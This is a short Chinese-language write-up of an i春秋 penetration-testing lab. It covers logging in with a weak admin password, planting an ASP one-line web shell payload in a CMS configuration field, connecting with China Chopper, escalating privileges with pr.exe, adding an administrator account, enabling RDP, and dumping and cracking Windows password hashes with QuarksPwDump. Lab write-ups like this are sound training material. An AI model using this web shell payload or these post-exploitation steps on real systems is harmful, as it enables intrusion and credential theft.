【i春秋综合渗透测试】《我很简单，请不要欺负我》

 

第2题：获取目标网站管理员的密码

扫到了后台（/admin）,本来想用sqlmap跑一下，但是随便试了个弱口令（admin888）就进去了。。。

 

第3题： getshell

配置插马：登录后台之后，找到网站配置信息，这个节目可能可以插马。真实环境中，我们可以下载相同版本的CMS，手测一下，不然插错就崩了，这里我随便插的，第一次就搞崩了，不过回显了配置文件的路径：

 

重启环境在 '公司名称' 那里插马    "%><%Eval Request(Chr(35))%><%'

 

插入成功，用中国菜刀连接

 

 

第4题：获取目标服务器密码

 

虚拟终端执行不了

 

需要提权

 

参考（ https://blog.csdn.net/qq_36119192/article/details/84562454）进行pr提权

 

在可读可写目录上传 pr.exe cmd.exe 3389.exe

 

创建账户添加到管理员组、开启3389

 

远程连接

 

下一步，获取系统管理员密码，准确的说是获取系统管理员密码的hash，上传密码获取工具

 

使用QuarksPwDump获取管理员hash

执行QuarksPwDump –dump-hash-local

 

解hash

( https://www.objectif-securite.ch/ophcrack)